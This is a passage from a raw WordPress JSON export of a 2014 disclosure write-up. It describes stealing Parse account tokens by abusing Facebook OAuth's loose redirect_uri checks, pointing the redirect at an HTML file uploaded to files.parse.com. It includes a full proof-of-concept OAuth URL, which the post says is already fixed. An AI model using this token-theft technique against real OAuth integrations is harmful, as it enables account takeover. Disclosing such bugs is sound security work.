https:\/\/www.facebook.com\/dialog\/oauth?response_type=code&client_id=506576959379594&redirect_uri=https%3A%2F%2Fwww.parse.com%2Fauth%2Ffacebook%2Fcallback&state=3c580f78d588e40668b80dc9b1e310db576cc830e0d02d08&scope=email <\/a>
\n<\/span><\/span><\/p>\n![\"\"](\"https:\/\/gianfrancoruggeri.com\/hacksecproject\/wp-content\/uploads\/2018\/04\/1-1024x588.png\")
<\/p>\n
<\/p>\n
The parameters that we have to consider are:<\/span><\/span><\/span><\/p>\n\n- response_type<\/span><\/span><\/span><\/li>\n
- client_id<\/span><\/span><\/span>\u00a0<\/span><\/span><\/span><\/li>\n
- redirect_uri<\/span><\/span><\/span>\u00a0<\/span><\/span><\/span><\/li>\n
- scope\u00a0<\/span><\/span><\/span><\/li>\n<\/ul>\n
So i started to create a forged URL that redirects the victim to a malicious site which saves the Parse token in a file.To do this,i started playing with the redirect_uri parameter to see if it allows access to subdomains or subfolders,and this was the result.<\/span><\/span><\/span>
\n
\n<\/span><\/span><\/span>
\n<\/span><\/span><\/span>
\nAllow request:<\/span><\/span><\/span>\u00a0<\/span><\/span><\/span><\/p>\n\n- xxx.parse.com\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 (Allow redirect to subdomains)<\/span><\/span><\/span><\/li>\n<\/ul>\n
\n- xxx.parse.com\/xxx\/\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 (Allow redirect to subfolders)<\/span><\/span><\/span><\/li>\n<\/ul>\n
![\"\"](\"https:\/\/gianfrancoruggeri.com\/hacksecproject\/wp-content\/uploads\/2018\/04\/2-1024x588.png\")
<\/p>\n
![\"\"](\"https:\/\/gianfrancoruggeri.com\/hacksecproject\/wp-content\/uploads\/2018\/04\/3-1024x588.png\")
<\/p>\n
<\/p>\n
I noticed that the redirect_uri allow access to subdomains and subfolders, so i looked for open redirect vulnerability in Parse’s domain and subdomains but i coulnd’t find anything.<\/span><\/span><\/span><\/p>\nI realized that Parse’s subdomains files.parse.com allows me to upload an html file, so i uploaded an html file which has some html code which redirects me to a malicious URL.The output URL to see the content of the page was:<\/span><\/span><\/span>
\nhttp:\/\/files.parse.com\/07c3d9cb-7a00-48c1-81d2-51d1f90bd8ad\/68f9cc54-b661-4448-a4bb-0f413a1bcf8e-wow.html <\/a><\/br>
\nFinal POC (Facebook already fix this issue)<\/br>
\nhttps:\/\/www.facebook.com\/dialog\/oauth?response_type=token&client_id=506576959379594&redirect_uri=http:\/\/files.parse.com\/07c3d9cb-7a00-48c1-81d2-51d1f90bd8ad\/68f9cc54-b661-4448-a4bb-0f413a1bcf8e-wow.html&state=3c580f78d588e40668b80dc9b1e310db576cc830e0d02d08&scope=email <\/a><\/br><\/br>This URL will redirect the user to the site which has a script that takes the token and will save it in a file.<\/p>\n","protected":false},"excerpt":{"rendered":"In this post i’m going to show how i was able to hack into Parse accounts via OAuth vulnerability. You can sign in into Parse by inserting your email and password or signing in with your Facebook account.<\/p>\n","protected":false},"author":2,"featured_media":13,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-60","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized-en"],"yoast_head":"\n
Facebook's Parse OAuth2 Bug -<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hacksecproject.com\/?p=60\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Facebook's Parse OAuth2 Bug -\" \/>\n<meta property=\"og:description\" content=\"In this post i’m going to show how i was able to hack into Parse accounts via OAuth vulnerability. You can sign in into Parse by inserting your email and password or signing in with your Facebook account.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hacksecproject.com\/?p=60\" \/>\n<meta property=\"article:published_time\" content=\"2014-05-14T14:39:58+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-11-23T17:01:39+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hacksecproject.com\/wp-content\/uploads\/2018\/04\/fb_1366971944_540x540-e1542991096310.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"540\" \/>\n\t<meta property=\"og:image:height\" content=\"263\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Medu554\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Medu554\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=60#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=60\"},\"author\":{\"name\":\"Medu554\",\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/#\\\/schema\\\/person\\\/526444cfaef818c23a7b4e4519573689\"},\"headline\":\"Facebook’s Parse OAuth2 Bug\",\"datePublished\":\"2014-05-14T14:39:58+00:00\",\"dateModified\":\"2018-11-23T17:01:39+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=60\"},\"wordCount\":386,\"image\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=60#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hacksecproject.com\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/fb_1366971944_540x540-e1542991096310.jpg\",\"articleSection\":[\"Uncategorized\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=60\",\"url\":\"https:\\\/\\\/hacksecproject.com\\\/?p=60\",\"name\":\"Facebook's Parse OAuth2 Bug -\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=60#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=60#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hacksecproject.com\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/fb_1366971944_540x540-e1542991096310.jpg\",\"datePublished\":\"2014-05-14T14:39:58+00:00\",\"dateModified\":\"2018-11-23T17:01:39+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/#\\\/schema\\\/person\\\/526444cfaef818c23a7b4e4519573689\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=60#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/hacksecproject.com\\\/?p=60\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=60#primaryimage\",\"url\":\"https:\\\/\\\/hacksecproject.com\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/fb_1366971944_540x540-e1542991096310.jpg\",\"contentUrl\":\"https:\\\/\\\/hacksecproject.com\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/fb_1366971944_540x540-e1542991096310.jpg\",\"width\":540,\"height\":263},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=60#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/hacksecproject.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Facebook’s Parse OAuth2 Bug\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/#website\",\"url\":\"https:\\\/\\\/hacksecproject.com\\\/\",\"name\":\"\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/hacksecproject.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/#\\\/schema\\\/person\\\/526444cfaef818c23a7b4e4519573689\",\"name\":\"Medu554\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/29ba1a61e7548d882dbad311db32d5e08fdc44eee25a59452ea4ac5a94ed80b3?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/29ba1a61e7548d882dbad311db32d5e08fdc44eee25a59452ea4ac5a94ed80b3?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/29ba1a61e7548d882dbad311db32d5e08fdc44eee25a59452ea4ac5a94ed80b3?s=96&d=mm&r=g\",\"caption\":\"Medu554\"},\"url\":\"https:\\\/\\\/hacksecproject.com\\\/?author=2\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Facebook's Parse OAuth2 Bug -","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hacksecproject.com\/?p=60","og_locale":"it_IT","og_type":"article","og_title":"Facebook's Parse OAuth2 Bug -","og_description":"In this post i’m going to show how i was able to hack into Parse accounts via OAuth vulnerability. You can sign in into Parse by inserting your email and password or signing in with your Facebook account.","og_url":"https:\/\/hacksecproject.com\/?p=60","article_published_time":"2014-05-14T14:39:58+00:00","article_modified_time":"2018-11-23T17:01:39+00:00","og_image":[{"width":540,"height":263,"url":"https:\/\/hacksecproject.com\/wp-content\/uploads\/2018\/04\/fb_1366971944_540x540-e1542991096310.jpg","type":"image\/jpeg"}],"author":"Medu554","twitter_card":"summary_large_image","twitter_misc":{"Scritto da":"Medu554","Tempo di lettura stimato":"2 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hacksecproject.com\/?p=60#article","isPartOf":{"@id":"https:\/\/hacksecproject.com\/?p=60"},"author":{"name":"Medu554","@id":"https:\/\/hacksecproject.com\/#\/schema\/person\/526444cfaef818c23a7b4e4519573689"},"headline":"Facebook’s Parse OAuth2 Bug","datePublished":"2014-05-14T14:39:58+00:00","dateModified":"2018-11-23T17:01:39+00:00","mainEntityOfPage":{"@id":"https:\/\/hacksecproject.com\/?p=60"},"wordCount":386,"image":{"@id":"https:\/\/hacksecproject.com\/?p=60#primaryimage"},"thumbnailUrl":"https:\/\/hacksecproject.com\/wp-content\/uploads\/2018\/04\/fb_1366971944_540x540-e1542991096310.jpg","articleSection":["Uncategorized"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/hacksecproject.com\/?p=60","url":"https:\/\/hacksecproject.com\/?p=60","name":"Facebook's Parse OAuth2 Bug -","isPartOf":{"@id":"https:\/\/hacksecproject.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hacksecproject.com\/?p=60#primaryimage"},"image":{"@id":"https:\/\/hacksecproject.com\/?p=60#primaryimage"},"thumbnailUrl":"https:\/\/hacksecproject.com\/wp-content\/uploads\/2018\/04\/fb_1366971944_540x540-e1542991096310.jpg","datePublished":"2014-05-14T14:39:58+00:00","dateModified":"2018-11-23T17:01:39+00:00","author":{"@id":"https:\/\/hacksecproject.com\/#\/schema\/person\/526444cfaef818c23a7b4e4519573689"},"breadcrumb":{"@id":"https:\/\/hacksecproject.com\/?p=60#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hacksecproject.com\/?p=60"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hacksecproject.com\/?p=60#primaryimage","url":"https:\/\/hacksecproject.com\/wp-content\/uploads\/2018\/04\/fb_1366971944_540x540-e1542991096310.jpg","contentUrl":"https:\/\/hacksecproject.com\/wp-content\/uploads\/2018\/04\/fb_1366971944_540x540-e1542991096310.jpg","width":540,"height":263},{"@type":"BreadcrumbList","@id":"https:\/\/hacksecproject.com\/?p=60#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hacksecproject.com\/"},{"@type":"ListItem","position":2,"name":"Facebook’s Parse OAuth2 Bug"}]},{"@type":"WebSite","@id":"https:\/\/hacksecproject.com\/#website","url":"https:\/\/hacksecproject.com\/","name":"","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hacksecproject.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Person","@id":"https:\/\/hacksecproject.com\/#\/schema\/person\/526444cfaef818c23a7b4e4519573689","name":"Medu554","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/29ba1a61e7548d882dbad311db32d5e08fdc44eee25a59452ea4ac5a94ed80b3?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/29ba1a61e7548d882dbad311db32d5e08fdc44eee25a59452ea4ac5a94ed80b3?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/29ba1a61e7548d882dbad311db32d5e08fdc44eee25a59452ea4ac5a94ed80b3?s=96&d=mm&r=g","caption":"Medu554"},"url":"https:\/\/hacksecproject.com\/?author=2"}]}},"_links":{"self":[{"href":"https:\/\/hacksecproject.com\/index.php?rest_route=\/wp\/v2\/posts\/60","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacksecproject.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacksecproject.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacksecproject.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hacksecproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=60"}],"version-history":[{"count":6,"href":"https:\/\/hacksecproject.com\/index.php?rest_route=\/wp\/v2\/posts\/60\/revisions"}],"predecessor-version":[{"id":288,"href":"https:\/\/hacksecproject.com\/index.php?rest_route=\/wp\/v2\/posts\/60\/revisions\/288"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hacksecproject.com\/index.php?rest_route=\/wp\/v2\/media\/13"}],"wp:attachment":[{"href":"https:\/\/hacksecproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=60"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacksecproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=60"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacksecproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=60"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"\"](\"https:\/\/gianfrancoruggeri.com\/hacksecproject\/wp-content\/uploads\/2018\/04\/Schermata-del-2013-08-22-17_25_58-1024x588.png\")
<\/p>\n